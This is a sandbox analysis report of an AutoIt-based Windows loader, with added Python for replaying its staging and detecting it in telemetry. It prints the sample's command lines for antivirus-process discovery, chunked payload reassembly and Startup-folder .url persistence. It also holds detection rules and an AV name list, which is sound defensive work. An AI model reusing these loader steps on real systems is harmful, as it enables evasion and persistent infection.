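The batch stage recorded in the Process created rows builds its two artefacts in the ways shown here: `findstr /V "TranscriptHousesConstitutesMedicaid" Hate` keeps every line of Hate that does not contain the marker (the report attributes the creation of Designing.pif to cmd.exe, consistent with that output being redirected into the file; the redirection is handled by cmd.exe and so never appears in findstr's own command line), and `copy /b ..\Rod + ..\Keep + ..\Prep + ..\Tsunami + ..\Invitations F` concatenates five fragments into F, the argument later passed to Designing.pif. The Python below is an added example, not code from the report or the sample: it replays both steps offline from the fragment files so an analyst working from a disk image can hash the result and compare it with the SHA256 the sandbox reports for the dropped file. The fixture data is constructed. Real findstr rewrites line endings to CRLF and has trouble with very long lines, so a hash mismatch means "compare against the file that was actually dropped", not "different payload".

```python
"""Offline replay of the two batch staging steps in this report. Added example
over constructed data; not the report's or the sample's code."""
import hashlib

MARKER = b"TranscriptHousesConstitutesMedicaid"                     # from the findstr /V command line
FRAGMENT_ORDER = ("Rod", "Keep", "Prep", "Tsunami", "Invitations")  # from the copy /b command line
REPORTED_SHA256 = "237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D"  # Designing.pif per the report


def findstr_v(data, marker, ignore_case=False):
    """Emulate `findstr /V "marker" file`: keep only lines that do NOT contain marker.
    Lines are split on LF and a preceding CR stays with its line. Real findstr
    rewrites line endings to CRLF and mishandles very long lines, so a result that
    does not hash-match the sandbox's dropped file is not proof of a different payload."""
    needle = marker.lower() if ignore_case else marker
    kept = []
    for line in data.split(b"\n"):
        hay = line.lower() if ignore_case else line
        if needle not in hay:
            kept.append(line)
    return b"\n".join(kept)


def copy_b(fragments):
    """Emulate `copy /b a + b + ... out`: binary concatenation in argument order."""
    return b"".join(fragments)


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest().upper()


def reconstruct(hate_bytes, fragments):
    """Rebuild Designing.pif from Hate and F from the five fragments (a dict
    name -> bytes; FRAGMENT_ORDER fixes the concatenation order) and hash both."""
    designing = findstr_v(hate_bytes, MARKER)
    payload_f = copy_b(fragments[name] for name in FRAGMENT_ORDER)
    return {
        "Designing.pif": designing,
        "Designing.pif.sha256": sha256_hex(designing),
        "F": payload_f,
        "F.sha256": sha256_hex(payload_f),
        "matches_report": sha256_hex(designing) == REPORTED_SHA256,
    }


# Constructed fixture: a minimal MZ/PE header (e_lfanew = 0x40, 'PE\0\0' at 0x40)
# interleaved with junk lines carrying the marker, which is how Hate must be laid
# out for findstr /V to yield a clean executable.
PE_HEAD = b"MZ\x90\x00" + b"\x00" * 56 + b"\x40\x00\x00\x00" + b"PE\x00\x00"
PE_TAIL = b"stub-section-data"
FAKE_PE = PE_HEAD + b"\r\n" + PE_TAIL
JUNK_LINE = b"TranscriptHousesConstitutesMedicaid filler\r\n"
HATE_FIXTURE = JUNK_LINE + PE_HEAD + b"\r\n" + JUNK_LINE + PE_TAIL
FRAGMENTS_FIXTURE = {"Keep": b"-part2-", "Rod": b"part1", "Invitations": b"-part5",
                     "Prep": b"part3", "Tsunami": b"-part4"}


def demo():
    return reconstruct(HATE_FIXTURE, FRAGMENTS_FIXTURE)
```

On a real case, read Hate and the five fragment files from the `585723` parent directory into `reconstruct`; `matches_report` turning True is the confirmation that the on-disk fragments produce the same Designing.pif the sandbox saw.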
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00BB59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B45EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_007159B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006A5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B533B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | API coverage: 4.7 %
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | API coverage: 4.5 %
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Code function: 0_2_00405B98 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Code function: 0_2_00406559 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Code function: 0_2_004029F1 FindFirstFileW
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B94005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B9494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B93CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B9C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B9CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B9CD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B9F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B9F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B9FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006F4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006F494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006FC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006FCD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006FCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006FF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006FF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006FFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006F3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B45D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\585723\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\585723
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D9E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
Source: EchoSync.pif, 0000000F.00000002.2897348540.0000000003339000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHI
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00BA45D5 BlockInput
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B45240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B65CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_00405BBF GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405BBF
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B888CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00B888CD
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00B5A385
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5A354 SetUnhandledExceptionFilter,10_2_00B5A354
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006BA354 SetUnhandledExceptionFilter,15_2_006BA354
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006BA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_006BA385
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B89369 LogonUserW,10_2_00B89369
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B45240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00B45240
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B91AC6 SendInput,keybd_event,10_2_00B91AC6
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B951E2 mouse_event,10_2_00B951E2
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Sexuality Sexuality.cmd & Sexuality.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 585723
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "TranscriptHousesConstitutesMedicaid" Hate
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Rod + ..\Keep + ..\Prep + ..\Tsunami + ..\Invitations F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\585723\Designing.pif Designing.pif F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif" "C:\Users\user\AppData\Local\SyncTech Innovations\p"
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\echosync.url" & echo url="c:\users\user\appdata\local\synctech innovations\echosync.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\echosync.url" & exit
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\echosync.url" & echo url="c:\users\user\appdata\local\synctech innovations\echosync.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\echosync.url" & exit
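The process-creation chain above is a textbook cmd/AutoIt loader: tasklist output is grepped with findstr for antivirus process names, a marker line is stripped out of Hate with findstr /V, the payload chunks Rod, Keep, Prep, Tsunami and Invitations are glued back together with copy /b into F, the renamed AutoIt interpreter Designing.pif is run from Temp with F as its script, and persistence is written into the Startup folder by echoing a .url file. The Python below is an added example written for this page, not code from the report or from Joe Sandbox: it turns each of those steps into a rule over process-creation telemetry. The event records are constructed from the command lines listed above, and the parent/image/cmdline field names are an assumed schema, not any particular EDR's.

```python
import re

# Process names the loader greps for in the tasklist output; taken from the
# two findstr command lines in this report.
AV_PROCESSES = {
    "wrsa.exe", "opssvc.exe", "avastui.exe", "avgui.exe",
    "bdservicehost.exe", "ekrn.exe", "nswscsvc.exe", "sophoshealth.exe",
}

CMD = r"C:\Windows\SysWOW64\cmd.exe"
DESIGNING = r"C:\Users\user\AppData\Local\Temp\585723\Designing.pif"
ECHOSYNC = r"C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif"


def ev(parent, image, cmdline):
    """Minimal constructed process-creation record (assumed schema)."""
    return {"parent": parent, "image": image, "cmdline": cmdline}


# Constructed telemetry: one record per "Process created" line in the report.
EVENTS = [
    ev(r"C:\Users\user\Desktop\C3KzPHU3UG.exe", CMD,
       r'"C:\Windows\System32\cmd.exe" /k move Sexuality Sexuality.cmd & Sexuality.cmd & exit'),
    ev(CMD, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    ev(CMD, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "wrsa.exe opssvc.exe"'),
    ev(CMD, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    ev(CMD, r"C:\Windows\SysWOW64\findstr.exe",
       'findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"'),
    ev(CMD, CMD, "cmd /c md 585723"),
    ev(CMD, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /V "TranscriptHousesConstitutesMedicaid" Hate'),
    ev(CMD, CMD, r"cmd /c copy /b ..\Rod + ..\Keep + ..\Prep + ..\Tsunami + ..\Invitations F"),
    ev(CMD, DESIGNING, "Designing.pif F"),
    ev(CMD, r"C:\Windows\SysWOW64\choice.exe", "choice /d y /t 5"),
    ev(r"C:\Windows\System32\wscript.exe", ECHOSYNC,
       f'"{ECHOSYNC}" "C:\\Users\\user\\AppData\\Local\\SyncTech Innovations\\p"'),
    ev(DESIGNING, CMD,
       r'cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\echosync.url" & echo url="c:\users\user\appdata\local\synctech innovations\echosync.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\echosync.url" & exit'),
]


def _name(path):
    return path.rsplit("\\", 1)[-1]


def rule_av_discovery(e):
    """findstr /I "<proc> <proc> ...": grepping a tasklist dump for security products."""
    if _name(e["image"]).lower() != "findstr.exe":
        return None
    m = re.search(r'/i\s+"([^"]+)"', e["cmdline"], re.I)
    hits = {t.lower() for t in m.group(1).split()} & AV_PROCESSES if m else set()
    return f"security software discovery: {', '.join(sorted(hits))}" if hits else None


def rule_marker_strip(e):
    """findstr /V "<long marker>" <file>: drop a marker line to reveal the embedded PE."""
    if _name(e["image"]).lower() != "findstr.exe":
        return None
    m = re.search(r'/v\s+"([A-Za-z0-9]{16,})"\s+(\S+)', e["cmdline"], re.I)
    return f"marker-line stripping from {m.group(2)}" if m else None


def rule_chunk_reassembly(e):
    """copy /b a + b + c out: binary concatenation of a payload split into chunks."""
    m = re.search(r'copy\s+/b\s+\S+(?:\s*\+\s*\S+)+\s+(\S+)', e["cmdline"], re.I)
    return f"chunk reassembly into {m.group(1)}" if m else None


def rule_pif_from_temp(e):
    """A .pif (legacy DOS-shortcut extension, a PE here) executed out of the Temp folder."""
    img = e["image"].lower()
    if img.endswith(".pif") and "\\appdata\\local\\temp\\" in img:
        return "renamed PE (.pif) executed from Temp"
    return None


def rule_wsh_launches_pe(e):
    """wscript/cscript spawning a binary outside the Windows directory."""
    if (_name(e["parent"]).lower() in {"wscript.exe", "cscript.exe"}
            and not e["image"].lower().startswith("c:\\windows\\")):
        return f"WSH spawned {_name(e['image'])}"
    return None


def rule_startup_url(e):
    """echo [InternetShortcut] redirected into the Startup folder: autostart without a registry write."""
    c = e["cmdline"].lower()
    if "[internetshortcut]" in c and "\\startup\\" in c and ".url" in c:
        return "Startup-folder .url persistence"
    return None


RULES = [rule_av_discovery, rule_marker_strip, rule_chunk_reassembly,
         rule_pif_from_temp, rule_wsh_launches_pe, rule_startup_url]


def evaluate(events):
    """Return (finding, image) pairs for every rule that fires on every event."""
    findings = []
    for e in events:
        for rule in RULES:
            hit = rule(e)
            if hit:
                findings.append((hit, e["image"]))
    return findings


if __name__ == "__main__":
    for finding, image in evaluate(EVENTS):
        print(f"{_name(image):<16} {finding}")
```

Two caveats a practitioner would want: the pipe between tasklist and findstr is not visible in process-creation events, so the discovery rule keys on the findstr child alone and tolerates the benign tasklist siblings; and the AV name list is only what this sample greps for, so in production it should be a maintained list, not these eight names.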
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B888CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B94F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: Designing.pif, 0000000A.00000003.1692590846.0000000004653000.00000004.00000800.00020000.00000000.sdmp, Designing.pif, 0000000A.00000000.1685656569.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp, EchoSync.pif, 0000000F.00000000.1790935077.0000000000746000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Designing.pif, EchoSync.pif | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B5885B cpuid
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B70030 GetLocalTime,__swprintf
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B70722 GetUserNameW
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B6416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Code function: 0_2_00405C70 GlobalAlloc,lstrlenW,GetVersionExW,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GlobalFree,lstrcpyW,OpenProcess,CloseHandle,CharUpperW,lstrcmpW,GlobalFree,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,lstrcmpW,CloseHandle,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,CloseHandle
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: EchoSync.pif | Binary or memory string: WIN_81
Source: EchoSync.pif | Binary or memory string: WIN_XP
Source: EchoSync.pif | Binary or memory string: WIN_XPe
Source: EchoSync.pif | Binary or memory string: WIN_VISTA
Source: EchoSync.pif | Binary or memory string: WIN_7
Source: EchoSync.pif | Binary or memory string: WIN_8
Source: Statute.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00BA696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00BA6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_0070696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_00706E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK matrix (one row per rank of the matrix; a number before a technique is the count of signatures that matched it, techniques without a number are the matrix's unmatched placeholder cells)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 1 Windows Management Instrumentation | 1 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 21 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
